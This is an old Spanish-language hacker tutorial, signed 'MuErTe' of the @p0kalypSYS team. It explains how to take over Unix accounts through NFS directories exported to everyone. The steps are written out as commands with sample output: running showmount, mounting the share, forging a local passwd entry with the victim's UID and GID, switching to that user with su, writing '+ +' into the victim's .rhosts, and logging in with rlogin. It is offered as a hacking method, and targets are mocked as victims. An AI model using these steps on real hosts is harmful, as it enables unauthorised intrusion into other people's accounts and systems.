***********************

*          Hackear Unix                  *

*        ------ RPC ------            *

*                  By:                          *

*               MuErTe                     *

*************************

Buenas :)

En este .txt, os presento una muy buena teknika para konseguir Unix SHELLS via RPC.

Todo lo ke contare, se tiene ke hacer komo user " root "

sino no es posible usar todos los komandos necesarios.

1. Requisitos:

1: Linux ( kon las opciones de NFS soportadas en el kernel )

2: los progranas mount , showmount , su , echo. ls , rlogin y el joe.

3: Paciencia xDD

2. Comienzo.

Para ver si un host unix exporta direktorios debemos usar el showmount de la siguiente forma:

showmount -e makina.ke.kieres.hackear

Si da la kuasalidad ke exporta algo, te saldra una lista

de este estilo:

ap0ka:~/# showmount -e tiburon.ns.net

Export list for tiburon.ns.net:

/hd3 lacoste.ns.net

/home/users (everyone)

/ 153.17.134.2

Lo ke vemos, es una serie de direktorios ke permiten ser montados por otras makinas.

El primero, solo se puede montar desde " lacoste.ns.net " lo mismo kel tercero ke solo se puede montar desde la ip " 153.17.134.2 ". Si porbasemos de montar esos direktorios nos denegaria el acceso.

Pero.. en el segundo direktorio vemos ke no hay un nombre de host, pero dice " (everyone) " Es decir, ke kualkier host puede montar ese direktorio ;) xD. Pues eso es lo ke vamos a aprobechar. Eso klase de direktorios se usan mucho para instalaciones linux via NFS, donde dentro del direktorio suele estar la distribucion kompleta del Linux.

2. Konnectemos xD

Una vez descubierta una makina ke exporte direktorios " (everyone) ", lo ke tenemos ke hacer logikamente es motarla en nuestro HD en kualkier direktorio vacio ke tengamos de la siguiente manera. En el ejemplo, usare el direktorio /mnt ke basikamente, fue kreado para montar diskos o otros hosts.

ap0ka:~/# mount -nt nfs ip_de_la_makina:direktorio(everyone) /direktorio_de_nuestro_ordenata.

Osease komo en el ejempo.

ap0ka:~/# mount -t nfs tiburon.ns.net:/home/users /mnt

Una vez hecho esto.. el direktorio se habra montado en nuestro direkotiro /mnt.

Pos vamos al direktorio yu veamos ke hay.

ap0ka:~/# cd /mnt

ap0ka:~/mnt# ls

pepe

raul

fina

profesores

gonzalez

biblio

ap0ka:~/mnt#

En este kaso , pero no en todos, suele haber direktorios de usuarios ke usan esa makina. Pues debemos fijarnos en los permisos de esos direktorios para ver el GID y UID de kada user.

( si no hay usuarios, intentemos profundizar en otros direktorios ke puedan haber, y intentar buskar siempre un direktorios /home o /users kes donde mas posibilidades hay.)

ap0ka:~/mnt/# ls -la

drwxr-x--x 22 pepe 501 1024 Feb 28 1996 pepe/

drwxr-xr-x 473 7999 590 8192 Nov 24 12:29 raul/

drwxr-x--x 23 fina 3011 2048 Feb 3 01:36 fina/

drwxr-x--x 22 7999 3004 1024 Feb 28 1996 profesores/

drwxr-xr-x 3049 gonzalez 3004 8192 Nov 24 12:29 gonzalez/

drwxr-xr-x 473 7999 sys 8192 Nov 24 12:29 biblio/

Una vez ya tenemos la lista de direktorios kon sus respektivos GID y UID, eskojeremos uno de los users ( el ke nos apetezka ;) xD)

Pos por probar con uno kualkiera eskojere el user gonzalez para contaros tol mogollon.

3: Preparemos nuestro sistema.

Editamos nuestro /etc/passwd

y kreamos una kuenta del user gonzalez kon el guid y uid de gonzalez en su makina de esta forma.

user:X:GID:UID:lo ke keramos:direktorio donde lo tenemos montado:/bin/bash

osease:

gonzalez:x:3049:3004:Cerdo Pordiosero!! Ya eres mi viktima xD:/mnt/home/gonzalez:/bin/bash

ponemos " x " donde el password, Vale?? xDD

4: Ya kasi esta xD

Kambiamos nuestro login por el de gonazlez kon el komnado su:

ap0ka:~/# su gonzalez

ap0ka:~/$

Y podremos trabajar kon el user gonzalez kon sus mismos GID y UID.

<LaMeR> Y ahora keeeeeeeeeeeeeeee?

<MuErTe> xDDDDD trankilorrrrrrssssss!!

<MuErTe> Ke ahora viene lo buenor xDDDD

<LaMeR> jejje :(

* pheo esta nervioso por saber komo termina

<MuErTe> xDD Paciencia . Muhahauhaua toy zumbao xD

<pheo> jejjeejje

Pues nos dirigimos al direktorio gonzalez del /mnt/home , y konke tenemos el mismo gid y uid que el , el servidor remoto se kree ke somos el ususrio real

y nos deja meter/escribir dentro lo ke keramos. A eso ya lo llamaria todo un 10, pero.. solo metiendo kosas.. ke diversion enkuentro? Ninguna!. Pues a por la shell!! xD..

Konke el servidor remoto nos konfunde kon el user normal, y nuestro linux, se kree ke es un direktorio real de nuestra makina, podemos usar otro famos bug de las SHELLS UNIX, el del " .rhosts " para konektar kon rlogin.

5. SHELL!!! XD

Namas nos keda usar el " echo " para meter/editar el .rhosts y meterle centro el famoso " + + " ke deja entrar en la makina desde kualkier host.

ap0ka:/mnt/home/gonzalez$ echo + + > .rhosts

Volvemos a nuestro estado normal de SuperUsuario (root) y ya podemos desmontar el direktorio:

ap0ka:/mnt$ exit

ap0ka:/mnt# cd

ap0ka:~/#

ap0ka:~/# rlogin -l gonzalez tiburon.ns.net

;)) xD

Y dentro xD

De nada.

Saludos a todos mi skolegas del @p0kalypSYS Team. ViruX, SaGe, JaeGerz , aCiDeViL, X-B00T & r3b00t.

Tambe komo no a to la peqa del #hackers #hack y #linux del Irc-hispano.

byez.

****************************

* *

* MuErTe@ap0ka.org *

* Linux SlackWare User *

* @p0kalypSYS MembAH!! *

* *

****************************